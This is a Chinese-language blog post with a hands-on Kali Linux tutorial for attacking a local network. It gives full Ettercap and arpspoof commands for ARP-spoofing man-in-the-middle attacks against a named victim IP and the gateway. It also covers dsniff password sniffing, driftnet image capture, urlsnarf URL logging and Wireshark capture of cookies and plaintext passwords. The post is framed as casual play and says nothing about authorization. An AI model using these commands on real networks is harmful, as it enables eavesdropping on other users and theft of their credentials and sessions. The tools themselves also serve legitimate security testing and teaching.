kalilinux內網嗅探,區域網監控記錄
快過年了沒事瞎玩玩,2017有空玩玩kali。前提需要連結到無線網
一、Ettercap(Etter [人名] 埃特cap[kæp] 蓋;帽子)是一款嗅探工具,包含ARP欺騙,DNS,劫持,中間人攻擊,嗅探密碼等功能
(ettercap經常報錯ERROR 12 Cannot allocate memory,不知道怎麼解決哪位大神指教一下,求教)
開啟轉發,重新開啟一個命令列:
echo "1">/proc/sys/net/ipv4/ip_forward
ARP(Address Resolution Protocol)即地址解析協議是根據IP地址獲取實體地址的一個TCP/IP協議。
1、切換到Sniff標籤,點選Unified sniffing…,選擇wlan0網路介面,(wlan0 是無線介面eth0 是有線介面)
2、Host標籤,點選Scan for hosts,很快,Ettercap就列出了所有該網路下的C類地址,點選192.168.1.102(被攻擊者IP)新增到Target 1,點選192.168.1.1(閘道器地址)新增到Target 2
3、設定中間人,Mitm->arp poisoning...->Sniff remote connections打對勾 點選確定
4、Start->Start sniffing 開始監聽
5、點view -- connections開始檢視連線:
命令列方式
ettercap -T -q -i wlan0 -M arp:remote /192.168.1.102/192.168.1.1/
ettercap使用方法,引數詳解:
-P 使用外掛
-T 使用基於文字介面
-q 啟動安靜模式(不回顯)
-M 啟動ARP欺騙攻擊
192.168.1.102/ 被攻擊的目標主機,第二個192.168.1.1閘道器ip
ettercap -i wlan0 -Tq -M arp:remote /192.168.1.100-253/ /192.168.1.1/
第一個/ / 中內容為所欺騙的目標,第二個為閘道器。 可寫// // 裡面為空,表示全部欺騙。
二、arpspoof 進行arp欺騙
必須另外開啟終端 echo 1>/proc/sys/net/ipv4/ip_forward 進行IP流量轉發,不然被攻擊者無法上網
命令:arpspoof -i wlan0 -t 192.168.1.1 192.168.1.102
嗅探密碼:dsniff -i wlan0
三、driftnet (drift 英 [drɪft] n.漂移,偏移;趨勢) 是一款簡單的圖片捕獲工具;urlsnarf捕獲url連結
再開啟一個終端,輸入driftnet -i wlan0 彈出一個小方框等待獲取圖片
語法 : driftnet [options] [filter code]主要引數:
-b 捕獲到新的圖片時發出嘟嘟聲
-i interface 選擇監聽介面
-f file 讀取一個指定pcap資料包中的圖片
-p 不讓所監聽的介面使用混雜模式
-a 後臺模式:將捕獲的圖片儲存到目錄中(不會顯示在螢幕上)
-m number 指定儲存圖片數的數目
-d directory 指定儲存圖片的路徑
-x prefix 指定儲存圖片的字首名
使用舉例:讀取一個指定pcap資料包中的圖片 driftnet -f /home/linger/backup/ap.pcapng -a -d /root/drifnet/
再開啟一個終端,輸入 urlsnarf -i wlan0 監聽瀏覽過的網頁日誌,等待獲取
五、 資料包捕獲工具
1、wireshark:命令列wireshark啟動,中間的Capture 選擇 wlan0 然後點選 Start,獲取cookie以及沒有加密的明文密碼2、tcpdump:可以將網路中傳送的資料包完全截獲下來提供分析。支援針對網路層、協議、主機、網路或埠的過濾
命令列 tcpdump -i wlan0